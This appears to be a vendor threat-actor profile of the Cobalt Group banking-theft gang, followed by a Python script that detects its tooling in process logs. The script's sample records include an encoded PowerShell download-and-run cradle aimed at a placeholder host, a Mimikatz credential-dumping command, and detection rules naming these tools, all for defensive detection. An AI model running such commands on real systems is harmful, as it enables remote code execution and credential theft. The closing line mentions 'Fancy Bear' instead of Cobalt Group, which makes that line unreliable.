Threat Actor Profile

Cobalt Group

Cobalt Group, also known as Cobalt Gang, is a financially motivated cybercrime organization that emerged around 2016. Known for its sophisticated and large-scale attacks on banks, ATMs, and payment systems, this group pioneered modern ATM jackpotting operations. Closely associated with Carbanak and FIN7, Cobalt Group has stolen an estimated €1 billion globally through targeted financial attacks.

Country of Origin

Cobalt Group is widely believed to operate out of Eastern Europe or Russia. While definitive attribution is challenging, their activities and tactics suggest origins in regions with a substantial cybercrime presence and organized affiliate networks.

Members

The exact size of Cobalt Group is unknown, but it is believed to be composed of a core group of operators and an extensive network of affiliates and hired money mules. This structure enables them to operate on a global scale while maintaining operational cover.

Leadership

The leadership of Cobalt Group remains largely unidentified. However, Europol coordinated an arrest of a key suspect in Spain in 2018, believed to be a high-ranking member of the group. Despite this, activities linked to Cobalt appear to have continued, likely due to its decentralized affiliate structure.

Cobalt Group TTPs

Tactics

The Cobalt Group is focused on financial gain, employing methods such as ATM jackpotting, SWIFT system manipulation, and wire fraud. Their primary objective is the direct theft of funds from financial institutions.

Techniques

Cobalt Group gains initial access through spear phishing campaigns whose attached documents exploit vulnerabilities in Microsoft Office. Once inside, the group deploys tooling such as Cobalt Strike Beacon and the Carbanak backdoor to establish persistence and escalate privileges within the network.

Procedures

Using tools like Mimikatz, PowerShell, and PsExec, the group moves laterally within compromised environments. To execute attacks, they manipulate SWIFT systems and remote ATMs, either causing ATMs to dispense cash in coordinated “cash-out” operations or transferring money to mule-controlled accounts. They rely on encrypted communications and anti-forensic techniques to hide their tracks.

Notable Cyberattacks

One of the group’s most infamous campaigns occurred between 2016 and 2018, involving ATM jackpotting operations that stole millions from banks across Eastern Europe and Asia. Another major breach involved the manipulation of SWIFT systems, enabling fraudulent wire transactions across multiple countries.

Law Enforcement & Arrests

A key leader of the Cobalt Group was arrested in Spain in 2018 through a Europol-coordinated operation. Despite this, the group’s activities have persisted sporadically, potentially carried out by splinter cells or affiliates.

How to Defend Against Cobalt Group

1. Email Security: Use advanced email filtering and sandboxing, and conduct employee security awareness training.

2. Regular Patch Management: Keep systems like Microsoft Office and Windows up to date to eliminate known vulnerabilities.

3. Network Segmentation: Isolate sensitive systems, including ATMs and SWIFT, from corporate networks.

4. Behavioral Monitoring: Implement tools to detect unusual patterns, such as lateral movement or unauthorized PowerShell activity.

5. Harden ATMs: Disable unnecessary admin tools and update endpoint protection software.
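The behavioral-monitoring recommendation above is easier to act on with a concrete rule set. The following script is an added example written for this page (it is not Huntress code and does not reflect any Huntress product's detection logic). It parses process-creation records in an assumed key=value format (the field names host, user, parent, image and cmd are assumptions, not a real product schema), and flags the procedures the profile lists: Office applications spawning PowerShell, encoded or hidden-window PowerShell, PsExec-style remote execution, and credential-dumping tooling. The sample records are constructed; the encoded command is generated at runtime so the decode path is exercised.

```python
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: a PowerShell download cradle encoded the way
# -EncodedCommand expects it (UTF-16LE, then base64). Placeholder host only.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')".encode("utf-16le")
).decode()

# Constructed process-creation records in an assumed key=value schema.
SAMPLE_RECORDS = [
    'host=WS01 user=jdoe parent=outlook.exe image=winword.exe cmd="winword.exe /n C:\\Users\\jdoe\\invoice.docx"',
    f'host=WS01 user=jdoe parent=winword.exe image=powershell.exe cmd="powershell.exe -nop -w hidden -enc {ENCODED}"',
    'host=SRV02 user=SYSTEM parent=services.exe image=PSEXESVC.exe cmd="PSEXESVC.exe"',
    'host=WS01 user=jdoe parent=cmd.exe image=mimikatz.exe cmd="mimikatz.exe privilege::debug sekurlsa::logonpasswords"',
    'host=WS03 user=asmith parent=explorer.exe image=powershell.exe cmd="powershell.exe -File C:\\Scripts\\backup.ps1"',
]

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Matches -e, -enc and -EncodedCommand followed by a base64 argument.
PS_ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient")


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def parse_record(line: str) -> dict:
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {key: (quoted or bare) for key, quoted, bare in FIELD_RE.findall(line)}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    match = PS_ENC_RE.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(rec: dict) -> list:
    """Apply the rule set to one parsed record and return its findings."""
    host = rec.get("host", "?")
    parent = rec.get("parent", "").lower()
    image = rec.get("image", "").lower()
    cmd = rec.get("cmd", "")
    findings = []
    if image in ("powershell.exe", "pwsh.exe"):
        if parent in OFFICE_APPS:  # macro/exploit document launching a shell
            findings.append(Finding(host, "office_spawns_powershell", f"{parent} -> {image}"))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits = [m for m in CRADLE_MARKERS if m in decoded.lower()]
            findings.append(Finding(host, "encoded_powershell", f"decoded={decoded!r} markers={hits}"))
        if HIDDEN_RE.search(cmd):
            findings.append(Finding(host, "hidden_powershell_window", cmd))
    if image == "psexesvc.exe" or "psexesvc" in cmd.lower():  # PsExec service binary
        findings.append(Finding(host, "psexec_remote_execution", image))
    if "mimikatz" in image or "sekurlsa::" in cmd.lower():
        findings.append(Finding(host, "credential_dumping_tool", cmd))
    return findings


def scan(lines) -> list:
    """Run every record through the rules; benign records yield nothing."""
    out = []
    for line in lines:
        out.extend(evaluate(parse_record(line)))
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the constructed records, the script produces five findings: three for the Office-spawned, encoded, hidden-window PowerShell on WS01, one for the PsExec service on SRV02, and one for the Mimikatz invocation; the scheduled backup script on WS03 produces none, which is the baseline a rule like this has to preserve. In production the same rules would be fed from Sysmon or EDR process-creation events rather than hand-built lines, and the Office-to-PowerShell rule in particular should be tuned against the organization's own parent/child baseline before it pages anyone.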

Huntress solutions help protect organizations by monitoring endpoints, detecting intrusions, and mitigating Fancy Bear threats with enterprise-grade technology.
